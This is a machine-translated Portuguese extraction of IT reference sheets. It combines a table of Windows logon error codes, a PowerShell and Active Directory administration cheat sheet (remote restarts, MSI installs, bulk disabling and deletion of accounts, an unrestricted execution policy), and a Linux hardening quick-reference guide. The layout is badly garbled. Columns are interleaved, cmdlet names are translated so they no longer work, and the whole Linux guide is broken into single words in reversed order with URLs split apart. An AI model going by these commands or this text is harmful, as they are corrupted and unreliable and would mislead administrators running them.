7 restrições de dia da semana ou hora do dia
com proteção de tela protegida por senha)
0xC0000070 Restrição de estação de trabalho
Texto simples de rede (geralmente indica um logon no
8 0xC00000193 Expiração da conta
IIS com “autenticação básica”)
10 0xC0000071 Senha expirada
Área de Trabalho Remota
Os relógios entre o DC e o outro
11 Efetue login com credenciais armazenadas em cache 0xC0000133
computador estão muito dessincronizados
TM
0xC0000224 O usuário deve alterar a senha no próximo login

0xC0000225 Evidentemente um bug no Windows e não um risco

Preencha a lacuna entre a aplicação e o SIEM

0xC000015b
O usuário não recebeu o tipo de logon solicitado
(também conhecido como direito de logon) nesta máquina
60 69
Machine Translated by Google

Obter endereços IP atribuídos ao computador atual -- Get-

WmiObject -Class
PowerShell Win32_NetworkAdapterConfiguration -Filter
RUNAS IPEnabled=TRUE -ComputerName . | Format-Tabela -
Endereço IP da propriedade
A partir do PowerShell 4.0, podemos especificar que um script requer
privilégios administrativos incluindo uma instrução #Requires com o
parâmetro de opção -RunAsAdministrator.#Requires Obtenha um relatório de configuração de IP mais detalhado
para a máquina atual
-RunAsAdministrator
-- Get-WmiObject -Class
Win32_NetworkAdapterConfiguration -Filter
Execute um script em um computador remoto
IPEnabled=TRUE -ComputerName . | Selecionar-Objeto -
-- invoke-command -computername máquina1, máquina2 -
Propriedade [az]* -ExcludeProperty IPX*,WINS*
caminho do arquivo c:\Script\script.ps1

Para encontrar placas de rede com DHCP habilitado no

Desligue remotamente outra máquina após um minuto
computador atual
-- Iniciar-Suspender 60; Reiniciar-Computador –Forçar –
-- Get-WmiObject -Class
Nome do computador MÁQUINA-ALVO
Win32_NetworkAdapterConfiguration -Filter
"DHCPEnabled=true" -ComputerName .
Instalar um pacote MSI em um computador remoto
-- (Get-WMIObject -ComputerName TARGETMACHINE -List | Where-Object
-FilterScript {$_.Name -eq "Win32_Product"}).Install(\ Habilitar DHCP em todos os adaptadores de rede no computador
atual -- Get-
\MACHINEWHEREMSIRESI
WmiObject -Class
DES\caminho\pacote.msi)
Win32_NetworkAdapterConfiguration -Filter IPEnabled=true
-ComputerName . | ForEach-Object -
Atualize um aplicativo instalado com um pacote de atualização de
Processo {$_.EnableDHCP()}
aplicativo baseado em MSI -- (Get-
WmiObject -Class Win32_Product -ComputerName . -Filter
Navegue pelo Registro do Windows como no sistema de arquivos -- cd
hkcu:
"Name='name_of_app_to_be_upgraded'").Upgrade(\\MAC
HINEWHEREMSIRESIDES\caminho\pacote_de_atualização.msi)
Pesquisar recursivamente por uma determinada string dentro de
arquivos -- dir –r | selecionar string "searchforthis"
Remover um pacote MSI do computador atual -- (Get-WmiObject
-Class Win32_Product -Filter "Name='product_to_remove'"
Encontre os cinco processos que usam mais memória -- ps | sort –
-ComputerName .
p ws | select –last 5
).Desinstalar()

Ciclo de um serviço (pare e reinicie-o) como DHCP --

Coletando informações Reiniciar-Serviço DHCP
Obtenha informações sobre a marca e o modelo de um
Listar todos os itens dentro de uma pasta -- Get-ChildItem – Force
computador
-- Get-WmiObject -Classe Win32_ComputerSystem
Recurse sobre uma série de diretórios ou pastas -- Get-
Obtenha informações sobre o BIOS do computador atual -- ChildItem –Forçar c:\directory –Recurse
Get-
WmiObject -Class Win32_BIOS -ComputerName . Remover todos os arquivos dentro de um diretório sem ser
solicitado para cada um -- Remove-Item C:\tobedeleted –
Listar hotfixes instalados (QFEs ou arquivos do Windows Update) Recursão

-- Get-WmiObject -Classe Win32_QuickFixEngineering -

Nome do computador . Reinicie o computador atual -- (Get-WmiObject -Class
Win32_OperatingSystem
Obter o nome de usuário da pessoa atualmente conectada a um -ComputerName .).Win32Shutdown(2)
computador
-- Get-WmiObject -Class Win32_ComputerSystem -
Propriedade UserName -ComputerName .

Encontre apenas os nomes dos aplicativos instalados no

computador atual
-- Get-WmiObject -Class Win32_Product -NomeDoComputador
. | Formato-Wide -Coluna 1

70 61
Machine Translated by Google

Definir-ExecutionPolicy nome de cada serviço do sistema e seu status, você pode usar o seguinte
comando:
Embora você possa criar e executar scripts do PowerShell, a Microsoft
Obter-Serviço | Selecionar-Nome do Objeto, Status | Exportar-
desabilitou os scripts por padrão em um esforço para evitar que códigos
CSV c:\service.csv
maliciosos sejam executados em um ambiente do PowerShell. Você
pode usar o comando Set-ExecutionPolicy para controlar o nível
de segurança em torno dos scripts do PowerShell. Quatro níveis de Obter-Processo
segurança estão disponíveis para você:
Assim como você pode usar o comando Get-Service para exibir uma lista
de todos os serviços do sistema, você pode usar o comando Get-
• Restrito — Restrito é a política de execução padrão e bloqueia o PowerShell
Process para exibir uma lista de todos os processos que estão atualmente
para que os comandos possam ser inseridos apenas interativamente.
em execução no sistema.
Scripts do PowerShell não têm permissão para execução.

Parar-Processo
• Todos assinados — Se a política de execução estiver definida como Todos
Às vezes, um processo congela. Quando isso acontece, você pode usar
Os scripts assinados poderão ser executados, mas somente se forem
o comando Get-Process para obter o nome ou o ID do processo para o
assinados por um editor confiável.
processo que parou de responder.
• Assinatura remota — Se a política de execução estiver definida como
Você pode então encerrar o processo usando o comando Stop-
Assinado remotamente, todos os scripts do PowerShell que foram
Process. Você pode encerrar um processo com base em seu nome ou em
criados localmente terão permissão para execução. Scripts criados
seu ID de processo. Por exemplo, você pode encerrar o Notepad
remotamente têm permissão para execução somente se forem assinados
usando:
por um publicador confiável.
Stop-Process - Bloco de notas de nomes
• Irrestrito — Como o nome indica, Irrestrito remove todas as restrições
da política de execução.
Parar-Processo -ID 2668
Você pode definir uma política de execução inserindo o comando
Set-ExecutionPolicy seguido pelo nome da política. Por exemplo, se
você quisesse permitir que scripts fossem executados de forma irrestrita,
Diretório ativo do PowerShell
você poderia digitar:
Redefinir uma senha de usuário
Vamos começar com uma tarefa típica de um profissional de TI:

Set-ExecutionPolicy sem restrições redefinir a senha de um usuário. Podemos fazer isso facilmente usando o
cmdlet Set-ADAccountPassword. A parte complicada é que a nova senha
deve ser especificada como uma string segura: um pedaço de texto
Obter-Política de Execução
criptografado e armazenado na memória durante a sessão do
Se estiver trabalhando em um servidor desconhecido, você precisará
PowerShell. Então, primeiro, criaremos uma variável com a nova senha:
saber qual política de execução está em uso antes de tentar executar um
script. Você pode descobrir usando o comando Get-
PS C:\> $new=Read-Host "Digite a nova senha" -
ExecutionPolicy .
ComoSecureString
Obter serviço
Em seguida, digitaremos a nova senha:
O comando Get-Service fornece uma lista de todos os serviços que PS C:\>
estão instalados no sistema. Se você estiver interessado em um Agora podemos recuperar a conta (é melhor usar
serviço específico, você pode acrescentar a opção -Name e o nome do samAccountname) e fornecer a nova senha.
serviço (curingas são permitidos). Quando você fizer isso, o Aqui está a mudança para o usuário Jack Frost:
Windows mostrará o estado do serviço. PS C:\> Definir-ADAccountPassword jfrost -NewPassword $new

Exportar-CSV Infelizmente, há um bug com este cmdlet: -Passthru, -

Assim como você pode criar um relatório HTML com base em Whatif e -Confirm não funcionam. Se você preferir uma abordagem de uma
dados do PowerShell, você também pode exportar dados do PowerShell para linha, tente isto:
um arquivo CSV que pode ser aberto usando o Microsoft Excel. PS C:\> Definir-ADAccountPassword jfrost -NewPassword
A sintaxe é similar à de converter a saída de um comando para HTML.
No mínimo, você deve fornecer um nome de arquivo de saída. Por (Converter para-SecureString -AsPlainText -String
exemplo, para exportar a lista de serviços do sistema para um arquivo
CSV, você pode usar o seguinte comando: "P@ssw0rd1z3" -força)
Por fim, preciso que Jack altere sua senha no próximo login, então
Obter-Serviço | Exportar-CSV c:\service.csv modificarei a conta usando Set-ADUser:
PS C:\> Definir-ADUser jfrost -ChangePasswordAtLogon $True
Selecionar-Objeto
Se você tentou usar o comando acima, sabe que havia inúmeras propriedades O comando não grava no pipeline ou console a menos que você use
incluídas no arquivo CSV. Geralmente é útil restringir as coisas incluindo -True. Mas posso verificar o sucesso recuperando o nome de usuário por
apenas as propriedades nas quais você está realmente interessado. É aqui meio do cmdlet Get-ADUser e especificando a propriedade
que o comando Select-Object entra em ação. O comando Select-Object PasswordExpired, mostrada na Figura 2.
permite que você especifique propriedades específicas para inclusão. Por
exemplo, para criar um arquivo CSV contendo o

71
62
Machine Translated by Google

Desabilitar e habilitar uma conta de usuário Adicionar membros a um grupo

Em seguida, vamos desabilitar uma conta. Continuaremos a escolher Vamos adicionar Jack Frost ao grupo de TI de Chicago:
Jack Frost. Este código aproveita o PS C:\> add-adgroupmember "chicago IT" -Membros jfrost
- Parâmetro Whatif, que você pode encontrar em muitos cmdlets É simples assim. Você pode facilmente adicionar centenas de usuários a um
que mudam as coisas, para verificar meu comando sem executá-lo: grupo, embora fazer isso seja um pouco mais estranho do que eu gostaria:

PS C:\> Desativar-ADAccount jfrost -whatif PS C:\> Add-ADGroupMember "Funcionários de Chicago" -

membro
E se: Executando a operação "Set" no alvo "CN=Jack
Geada, (get-aduser -filter "cidade -eq 'Chicago'")

OU=equipe,OU=Teste,DC=GLOBOMANTICS,DC=local". Usei uma expressão pipelined entre parênteses para encontrar todos os
Agora vamos fazer a ação de verdade: usuários com uma propriedade City de Chicago. O código entre
PS C:\> Desativar-ADAccount jfrost parênteses é executado e os objetos resultantes são canalizados para o
Quando chegar a hora de habilitar a conta, você consegue adivinhar o nome parâmetro -Member. Cada objeto de usuário é então adicionado ao grupo
do cmdlet? Chicago Employees. Não importa se há 5 ou 500 usuários; atualizar a

PS C:\> Habilitar-ADAccount jfrost associação ao grupo leva apenas alguns segundos. Essa expressão também

Esses cmdlets podem ser usados em uma expressão pipelined para pode ser escrita usando ForEach-Object, que pode ser mais fácil de seguir.

habilitar ou desabilitar quantas contas você precisar. Por exemplo,

este código desabilita todas as contas de usuário no departamento de
PS C:\> Get-ADUser -filter "cidade -eq 'Chicago'" | foreach
Vendas:
PS C:\> get-aduser -filter "departamento -eq 'vendas'" |
{Add-ADGroupMember "Funcionários de Chicago" -Membro $_}
desabilitar-adaconta

Enumerar membros de um grupo

Desbloquear uma conta de usuário Talvez você queira ver quem pertence a um determinado grupo. Por

Agora, Jack se trancou do lado de fora após tentar usar sua nova senha. exemplo, você deve descobrir periodicamente quem pertence ao grupo

Em vez de vasculhar a GUI para encontrar sua conta, posso desbloqueá-la Domain Admins:

usando este comando simples: PS C:\> Get-ADGroupMember "Administradores de domínio"

PS C:\> Desbloquear-ADAccount jfrost

O cmdlet grava um objeto AD para cada membro no pipeline. Mas e
quanto aos grupos aninhados? Meu grupo Chicago All Users é uma coleção
de grupos aninhados. Para obter uma lista de todas as contas de usuário, tudo
Excluir uma conta de usuário o que preciso fazer é usar o parâmetro -Recursive:
Excluir 1 ou 100 contas de usuário é fácil com o cmdlet Remove-ADUser.
Não quero excluir Jack Frost, mas se eu quisesse, eu poderia usar este PS C:\> Get-ADGroupMember "Todos os usuários de Chicago"
código:
PS C:\> Remove-ADUser jfrost -whatif
-Recursivo | Selecione DistinguishedName

E se: Executar a operação "Remover" no Alvo

Desabilitar uma conta de computador
"CN=Jack Talvez quando você encontrar essas contas inativas ou obsoletas, você queira
desabilitá-las. Fácil o suficiente. Usaremos o mesmo cmdlet que usamos com
Frost,OU=equipe,OU=Teste,DC=GLOBOMANTICS,DC=local".
contas de usuário. Você pode especificá-lo usando o samAccountname da
Ou eu poderia inserir um grupo de usuários e excluí-los com
conta:
um comando simples:
PS C:\> Desativar-ADAccount -Identidade "chi-srv01$" -whatif
PS C:\> get-aduser -filter "habilitado -eq 'false'"
E se: Executando a operação "Set" no alvo "CN=CHI-SRV01,

-propriedade WhenChanged -SearchBase "OU=Funcionários,

CN=Computadores,DC=GLOBOMANTICS,DC=local".
Ou você pode usar uma expressão em pipeline:
DC=Globomantics,DC=Local" | onde {$_.WhenChanged
PS C:\> get-adcomputer "chi-srv01" | Desativar-ADAccount
Também posso usar meu código para encontrar contas obsoletas e
-le (Get-Date).AddDays(-180)} | Remove-ADuser -whatif desabilitar todas elas:
Este comando de uma linha localizaria e excluiria todas as contas
PS C:\> get-adcomputer -filter "Senhaúltimaconfiguração
desabilitadas na unidade organizacional (UO) Funcionários que não foram
alteradas em pelo menos 180 dias.
-lt '1/1/2012'" -propriedades *| Desativar-ADAccount

72
63
Machine Translated by Google

necessário. Todas as expressões que mostrei a você podem ser

Encontre computadores por tipo
integradas em expressões maiores do PowerShell. Por exemplo, você
A última tarefa sobre a qual sempre me perguntam é encontrar contas
pode classificar, agrupar, filtrar, exportar para um valor separado
de computador por tipo, como servidores ou laptops. Isso requer um
por vírgula (CSV) ou criar e enviar por e-mail um relatório HTML, tudo
pouco de pensamento criativo da sua parte. Não há nada no AD que
do PowerShell e tudo sem escrever um único script do PowerShell!
distinga um servidor de um cliente, além do SO.
Na verdade, aqui está um bônus: um relatório de idade da senha do
Se você tem um laptop ou desktop executando o Windows Server usuário, salvo como um arquivo HTML:
2008, precisará ser mais criativo.
PS C:\> Get-ADUser -Filter "Habilitado -eq 'True' -AND
Você precisa filtrar contas de computador com base no SO. Pode ser
útil obter uma lista desses SOs primeiro:
PasswordNeverExpires -eq 'False'" -Propriedades
PS C:\> Get-ADComputer -Filter * -Properties Sistema
Operacional |
PasswordLastSet,PasswordNeverExpires,PasswordExpired |

Selecionar OperatingSystem -unique | Classificar OperatingSystem

Selecione

Quero encontrar todos os computadores que possuem um sistema operacional de servidor:

DistinguishedName,Nome,senha*,@{Nome="IdadeDaSenha"

PS C:\> Get-ADComputer -Filter "SistemaOperacional -como ;

'*Servidor*'" -propriedades SistemaOperacional,SistemaOperacional Expressão={(Get-Date)-$_.PasswordLastSet}} |sort

ServicePack | Selecione Nome,Op* | format-list PasswordAge -Descending | ConvertTo-Html -Título

Assim como com os outros cmdlets AD Get, você pode ajustar seus "Relatório de idade da senha" | Out-File c:\Work\pwage.htm
parâmetros de pesquisa e limitar sua consulta a uma UO específica, se

73 64
 Guia

http://
ID.
user-
set-
binários
associado
Normalmente
CERT.
pelo
publicados
avisos
a
levam
segurança
bugs
principais
todos
cento
50
por
Responsável
servidor.
root
propriedade
shell
fornecem
normalmente
instruções
com
do
reais
os
sobrescreve
seguida,
em
e,
memória
na
programa
armazenamento
de
buffer
no
dados
mais
colocar
tenta
processo
ou
usuário
um
quando
ocorre
que
condição
Uma
• e
Hat
Red
no
• userauth
features/
www.apacheweek.com/
http://
Apache
do
senha
e
diretório
de
•Proteção

e
Dicas
apt-

Buffer
Recursos

Glossário
AutoRPM

Overflow:
linux.org
www.bastille-
http://
Linux
Bastille
•Projeto
para
gateway
um
como
atue
interfaces
várias
com
Linux
caixa
uma
que
permite
IP
de
•mascaramento
interna
rede
na
Linux
caixa
à
conectados
hosts
para
remotas
redes

implementação.
de
informações
para
HOWTO
Masquerading
IP
o
Veja
interface.
autorizada.
transmissão
ou
detectada
não
alteração
sua
impedir
ininteligível,
significado
seu
tornar
para
dados
de
transformação
da
trata
que
matemática
ciência
•A para
como:
simples
algo
com
Comece
serviço.
executa
que
remoto
usuário
nome
o
potencialmente
mesmo
até
UDP
e
TCP
ICMP,
manipulando
"furtivas"
varreduras
executar
SO,
do
remota
versão
a
Pode
potencial.
em
comunicação
de
canais
os
determinar Instale
intro.html
bugtraq/
forums/
www.securityfocus.com/
http://
BugTraq
do
completa
divulgação
discussão
de
•Lista

o
nmap
usar.

Criptografia:
Edição
Segunda
Internet,
de
•Firewalls
funcionam.
protocolos
como
profundo
conhecimento
requer
firewall.
segurança
política
na
base
negado
ou
concedido
acesso
e
dados,
pacote
disponíveis
informações
com
acordo
analisados
então
Os
rede.
da
nível
firewall
do
interfaces
as
entre
passa
ele
medida
tráfego
filtragem
método
ataque.
precursor
desenvolvidos.
podem
respondem
aqueles
explorar
meios
possível,
hosts
máximo
sondar
Ao
máquina.
em
ativas
estão
portas
quais
determinar
processo
o
unidirecional.
Normalmente
eles.
originalmente
eram
não
interceptem
invasores
assim
permitindo
outro,
destinados
rotear
usado
ser
pode
Isso
outro.
disfarça
se
host
qual
no
•ataque
disponível.
banda
largura
toda
consumir
rede
conexão
a
desconectar
Variam
usar
tentam
outros
os
todos
dados
disponibilidade
à
ameaça
uma
são
Eles
recurso.
esse
usem
legítimos
usuários
que
impedir
para
intruso
de
alvo
é
recurso
um
quando
ocorre

de
1565928717
ISBN
Assoc,
&
O'Reilly

IP:
porta:
serviço:
#

pacotes:
Negação
Spoofing
Filtragem
Varredura
existem.
já
Linux
documentação
quantidades
vastas
das
nenhuma
leitura
substitui
não
Ele
segurança.
usados
ser
podem
que
métodos
sobre
conscientização
aumentar
e
aprofundadas
mais
informações
indicador
como
servir
sistema,
seu
do
segurança
a
melhorar
para
partida
ponto
um
fornecer
é
Rápida
Referência
de
Guia
deste
intenção
A novamente
executar
de
se
certifique-
seguida,
em
a/
argumentos
os
e / a
Adicione
inicialização.
momento
no
comando
linha
da
kernel
do
parâmetros
passar
ao
autorização
exigir
públicos
ambientes
em
servidores
para
senha
com
LILO
o
Proteja
improvement
security-
www.cert.org/
http://
CERT
Segurança
Melhoria
de
•Módulos

e,
etc/
sbin/
senha
lilo.conf
restritos
Machine Translated by Google

Introdução:
security_01.html
1999-10/
mag.com/
www.linux-
http://
Linux
do
segurança
à
•Introdução

recursos.
próprios
aos
negar
ou
informações
roubar
você,
para
avançado
conhecimento
usam
então
"crackers",
como
conhecidos
também
intrusos,
obtido
ser
pode
autorizado
acesso
O
pretendia.
não
você
que
algo
maliciosamente
transformar
sistema
seu
Até
dados.
alterar
mesmo
até
interceptar
oportunidade
usuários
dando
caminho,
longo
pontos
outros
vários
por
passar
podem
eles
Internet,
na
B
ao
ponto
do
vão
dados
seus
Conforme
insegura.
inerentemente
global
computação
porque
básico
requisito
é
agora
A
problema.
um
mais
vez
cada
tornando
se
está
segurança
a
software,
rápido
desenvolvimento
e
Internet
baratas
conexões
dados,
de
globais
comunicações
das
mudança
constante
em
mundo
No

=
detection
intrusion-
www.linuxsecurity.com/
http://
Linux
do
intrusão
detecção
de
•Recursos

restrito
Linux
rótulo
leitura
somente
john
www.openwall.com/
http://
Ripper
the
John
senhas
de
•Quebrador
em /
informações
restringir
buffer,
estouros
evitar
ajuda
que
segurança
melhorias
de
útil
conjunto
um
OpenWall
kernel
patch
•O
novatos.
para
é
não
kernel,
do
compilação
a
Requer
alterações.
outras
e

proc
advisories
www.linuxsecurity.com/
http://
Source
Open
e
Linux
segurança
de
•Avisos
segurança.
alertas
todos
ciente
estar
software
do
atuais
versões
instalado
ter
se
certificando-
atualizado
sistema
seu
Mantenha
afastados.
crackers
os
manter
de
ameaças
as
mitigar
pode
você
vigilância,
e
consistência
com
passo,
passo
segurança
a
Abordando
profundidade.
em
defesa
envolve
Segurança
crontab:
entrada
adicionar
basta
trabalho,
estações
Para
tempo.
linha
uma
construir
impossível
tornam
imprecisos
Registros
remotos.
sistemas
com
correlacionados
possam
segurança
eventos
para
precisos
ser
devem
log
arquivos
nos
hora
data/
de
carimbos
Os
precisos.
sejam
sistema
do
relógios
os
que
Garanta
•
permissão
obtêm
eles
executa,
os
quem
independentemente
que,
significa
o
root,
do
propriedade
setuid
arquivos
encontrará
você
Normalmente,
grupo.
ou
proprietário
de
privilégios
seus
como
executar
podem
todos
que
Arquivos
•
pacotes.
filtros
combinados
Normalmente
eles.
por
passem
específicos
serviços
apenas
permitem
único
propósito
escritos
cuidadosamente
programas
pequenos
tipicamente
são
Servidores
cliente.
final
destino
entre
estrangulamento
atua
cliente,
e
torna
se
instalado
proxy
servidor
um
com
host
Um
programa.
outro
nome
em
agem
Gateways,
Application
chamados
Também

o
ID
de
Set
User-
Proxy
docs
www.linuxsecurity.com/
http://
LinuxSecurity.com
do
segurança
referência
de
•Informações

Group-
seguro.
mais
consideravelmente
sistema
seu
tornar
a
ajudará
sozinho
isso
Fazer

(setgid):
(setuid) /
Gateway:
*
propósitos.
seus
para
mas
utilizável,
será
ainda
equilíbrio
de
ato
nesse
onde
decidir
precisa
Você
tornará.
se
segurança
sua
intrusiva
for,
sistema
seu
seguro
mais
Quanto

0-59/30
intrusivo.
não
teste
modo
o
primeiro
Experimente
mais.
muito
arquivo
permissões
auditoria
desnecessários,
rede
serviços
desativação
pacotes,
básica
filtragem
incluem
recursos
Os
host.
do
na
interativamente
avança
ele
enquanto
perguntas
fazendo
segurança,
melhorar
para
informadas
escolhas
façam
usuários
os
permite
Ele
padrão.
Linux
instalações
em
comuns
vulnerabilidades
das
muitas
elimina
que
shell
scripts
conjunto
um
é
Linux.
Bastille
proteção
de
ferramenta
a
execute
e
•Instale lists.html
mailing-
www.linuxsecurity.com/
http://
LinuxSecurity.com
do
segurança
discussão
de
•Listas

la.
monitorá-
vigor
está
auditoria
qual
e
site
seu
para
necessária
é
segurança
quanta
declarando
Segurança”
“Política
estabelecer
deve
máquinas,
ou
máquina,
sua
em
login
fazendo
pessoa
uma
de
mais
tiver
você
Se

tips
www.linuxsecurity.com/
http://
LinuxSecurity.com
dia
do
•Dica

e
newsletter.html
www.linuxsecurity.com/
http://
LinuxSecurity.com
segurança
de
semanal
•Boletim
root
acesso
exigiriam
forma,
outra
de
que,
específicos
comandos
executar
para
senha
própria
sua
arquivo
O
magneto:
no
quais
controla
sudoers
etc/
usar
vez
em
normal
usuário
um
como
privilegiados
do)
(superusuário
•Configure
. /

a
o
host.
integridade
a
manter
para
crucial
é
sistema
do
arquivos
nos
permissões
as
Monitorar

su.
sudo
quais
perfil.
ou
processamento
velocidade
rede,
conectividade
nível
do
independentemente
computadores,
em
frequentemente
ocorrem
conhecidas,
amplamente
locais,
e
rede
vulnerabilidades
diferentes
tipos
muitos
Existem
comprometida.
seja
segurança
a
permitir
de
potencial
o
tem
que
condição
Uma
modificada
versão
executa.
usuário
privilégios
os
explorando
ocultas,
funções
contendo
contém
mas
útil,
algo
fazer
pretende
malicioso
programador
modificado
é.
não
verdade
na
quando
benigno,
um
como
disfarça
se
programa
•Um
sistema.
no
execução
programas
outros
presença
ocultar
para
usada
ser
pode
exemplo,
por /

de
com
suspeito
programa
um
permissões
das
discriminatória
remoção
habilitar
Muitos
buffer.
estouros
frequente
causa
uma
executando,
esteja
quem
independentemente
o
como
executados
são
root”
ID
user-
“Set-
Os
permissões.
host
seu
em
programas
os
todos
Encontre
permissão.
dessa
precisarem
usuários
se
removidas
ser
podem
root,
exigiriam
forma,
outra
de
que,
operações
executar
setgid
ou
setuid
normal
usuário
do
desnecessário
e
autorizado
não
uso
qualquer
para
sistemas
seus
regularmente
•Audite

ps,
bin/
www.openssh.com
http://
OpenSSH
seguro
remoto
acesso
de
•Ferramenta

Troia:
Cavalo

root ,
Controlando
chmod:
Vulnerabilidade:
www.openwall.com
http://
OpenWall
Segurança
de
•Projeto

senha
e =/
solicitado:
quando
própria
sua
digita
autorizado
comando
o
com
executa
Dave
magneto

sudo
www.ntp.org
http://
Rede
Tempo
de
Protocolo
o
sobre
•Informações

x
Cmnd_Alias

fde
bin/
2000
usr/de /
6
dave$

janeiro
lpc>

www.insecure.org/
http://
nmap
porta
de
Scanner

15816
Senha:

em
disponíveis
opções
das
Muitas
0.
desabilitado
e
1
um
contiver
se
incluem:
ipv4
net/
sys/
proc/
sistema
pseudo-
meio
por
segurança
a
melhorar
para
estão
kernel
do
configuração
de
Várias
arquivos
Vários
/ /

proc

-r-
30560
proc/

raiz lp
sys .
edição.
segunda
Internet,
e
UNIX
•em

15816
Segurança
sistema:
seu
no
arquivos
os
todos
Localize
removidos.
ou
alterados
facilmente
são
writable
•world- 1565921488
ISBN
Assoc,
&
O'Reilly

tentar:
local,
rede
fora
conectar
específico
serviço
um
acesso
o
Bloqueando
Linux.
caixa
qualquer
em
externas
ameaças
contra
proteção
significativa
quantidade
uma
fornecer
pode
você
Usando
firewalls.
para
apenas
é
não
pacotes
de
filtragem
•A
suportar.
distribuição
sua
se
instalação
durante
MD5
senha
a
Use
usando /
utilizadas
contas
Desabilite
mantida.
segurança
como
senhas,
quebra
programas
Execute
distância.
passo
está
root
daí,
partir
-l.

l
ping
a
responda
host
este
que
impedirá
opção
esta
Habilitar
ECHO.
ICMP
solicitações
as
todas
• . •
bin/

rsync.samba.org
http://
rsync
arquivos
incremental
transferência
de
Utilitário
usr/

ou difícil.
parte
no
usuário
conta
qualquer
a
acesso
Obter
comprometido.
será
certamente
escolhida,
bem
e
eficaz
uma
Sem
negligenciados.
meios
dos
um
também
É
comprometimento.
contra
sistema
seu
proteger
para
crítico
mas
autenticação,
de
básico
mais
meio
o
senha
da
segurança
•A
garantir
por
responsável
é
você
quais
pelos
sistemas
em
regularmente
John

raiz#
Rachadura

passwd

de /
alguns
incluindo
todos,
por
gravados
ser
poderão
arquivos
vários
operação,
da
normal
curso
No
diretório
próprio
do
e /
ipchains,
Estripador o

dev
tmp .
hosts.
outros
serviço
negação
pacotes
inundação
ataques
para
detonador
como
usada
ser
pode
rede
Sua
multicast.
broadcast/
destino
endereço
um
com
ICMP
eco
de
solicitações
Ignore
•
faq/
ssh/
~satch/
www.employees.org/
http://
Shell
Secure
o
sobre
frequentes
•Perguntas
sistema.
seu
acessou
intruso
de
indicação
uma
ser
podem
também
sem
Arquivos
grupo.
a
pertencem
ou
dono
um
têm
não
que
arquivos
os
todos
identifique
e
•Localize

icmp_echo_ignore_all:
• docs
www.linuxsecurity.com/
http://
segurança
à
relacionados
FAQs
e
•HOWTOs
#
-I

roteador.
ou
host
como
configurado
está
kernel
o
se
depende
padrão
valor
O
-p

raiz#
input

tem
root
o
apenas
modificado,
será
sistema
arquivo
um
garantia
uma
seja
não
Embora
confiáveis.
binários
cima
em
colocados
Troia
Cavalos
ou
excluídos
sejam
log
arquivos
evitar
eficaz
particularmente
“imutáveis”
only”
“append-
atributos
dos
uso
O
fornece.
normal
que
do
acima
modificação
e
exclusão
controlar
de
capacidade
a
incluindo
diretórios,
las.
listá-
para
usado
ser
pode
enquanto
propriedades,
essas
adicionar
é
comando
proteção.
essa
remover
características
as
modificar
podem
administradores
comandos
os
•Usando

o
•
ipchains

rfc2196.txt
rfcs/
docs/
www.linuxsecurity.com/
http://
(RFC2196)
Site
do
Segurança
de
•Manual

chattr
icmp_echo_ignore_broadcasts:

chmod
lsattr ,
estoura.
socket
um
SYN
backlog
de
fila
a
quando
syncookies
Envia
SYN”.
“Ataque
o
contra
•

sudo
root
acesso
controle
de
•ferramenta
interna.
rede
contra
IP
spoofing
ataques
evitar
para
roteadores
os
todos
em
opção
esta
Habilite
habilitada.
está
origem
de
endereço
do
verificação
a
se
Determina
•
sudo
www.courtesan.com/
http://

tcp_syncookies:
rp_filter:
Detecção

padrão.
lista
na
listados
gateways
para
somente
ICMP
redirecionamento
de
mensagens
Aceita
• invasor.
do
ações
pelas
responsabilização
fornecer
ajudam
intruso
presença
a
detectar
para
proteção
adicional
nível
um
fornecem
Eles
regularmente.
encontradas
explorações
vulnerabilidades
novas
e
evolução,
constante
em
está
Internet
A
rede.
qualquer
integrante
parte
são
intrusão
detecção
Dispositivos
www.snort.org
http://
Snort
Rede
Intrusão
Detecção
de
•Sistema
gravados,
foram
dados
os
eles.
anexação
a
apenas
permitindo
protegidos
log
arquivos
Os
incluem
essas
adequados
Arquivos
imutáveis.
para
alterados
eles
rotacionados,
vez
Uma
rastros.
remover
tentando
cracker
um
contra
adicional
proteção
fornecer
pode
log,
rotação
de
scripts
seus
em
modificações
exija
isso
Embora
removidos.
ser
podem
frequentemente.
mudar
devem
não
que
outros
e / /

etc/
bin/
rpm,
login, /
shadow,
• intrusão.
tentativa
possível
uma
considerados
ser
podem
que
anômalos
eventos
observando
real,
tempo
em
tráfego
de
análises
realiza
rede
intrusão
detecção
ferramenta
A
www.tripwiresecurity.com
http://
Tripwire
arquivo
integridade
de
•Ferramenta
snort

exija.
específico
motivo
um
que
menos
a
desabilitado,
ser
Deve
recusados.
ou
aceitos
são
origem
de
roteados
pacotes
os
se
Determina
•
uso:
prontos
recursos
completo
bastante
potenciais.
vulnerabilidades
1100
mais
detectar
capacidade
a
inclui
atualmente
Snort
O
instalar.
minutos
alguns
apenas
leva
e
regras
desenvolvimento
para
familiares
métodos
utiliza
configurado,
facilmente
Ele
gerado.
é
alerta
um
aplicativo,
ou
IP
nível
rede,
de
tráfego
do
conteúdo
no
base
Com

#
+i /
snort.html
using-
www.linuxsecurity.com/
http://
Snort
•Usando

bin/
login
usando
valores
seus
configurar
possível
é
Também
parâmetros.
esses
controlar
para
usado
ser
pode
arquivo / /
programa
O
sistema.
do
inicialização
na
processado
e
padrões
configurações
algumas
contém
recente
Hat
Red
no

chattr
o
etc/
bin/
sbin/
sysctl
sysctl.conf
secure_redirects: accept_source_route:

corporativo.
site
dedicado
servidor
um
ou
doméstica
DSL
conexão
monitorar
existente
trabalho
estação
uma
em
usado
ser
Pode
mais;
muito
DDoS
clientes
conhecidas,
bem
sistema
vulnerabilidades
backdoors
porta,
scanners
outros
NMAP
NetBIOS,
consultas
SMB
sondagens
CGI,
ataques
furtivas,
porta
varreduras
buffer,
estouros
incluindo
ameaças,
para
padrões
de
correspondência
na
base
com
alerte
e
•Detecte
deve
o
bloco,
ou
caractere
dispositivos
criação
e
programas
de
execução
a
proíbem
outros
por
graváveis
são
que
partições
para
como
assim
usuário,
home
nas
em
opção
Use
home.
diretórios
seus
setuid
executar
possam
usuários
os
razão
uma
haver
•Nunca
informações.
mais
manual
do
página
Veja
forma.
qualquer
necessário
será
nunca
/ /

etc/
var,
fstab
mount
nosuid
noexec
eco

e
o
usar
desejar
pode
também
Você
root.

o
ou /
sistema
do
inicialização
de
um
em
escrito
ser
deve
Isso
kernel
diretório
arquivo
disponíveis
estão
informações
Mais
reinicialização.
cada
após
ocorrer
para
Hat
Red
no
Conceito
Implementação

etc/

nodev
Permissão

proc.txt
http://

sysctl.conf
Documentation/

74
.
Português
 e
desnecessários.
são
que
aqueles
remova
seguida,
em
e,
instalados
lista
escanear
para
distribuição
sua
da
pacotes
gerenciamento
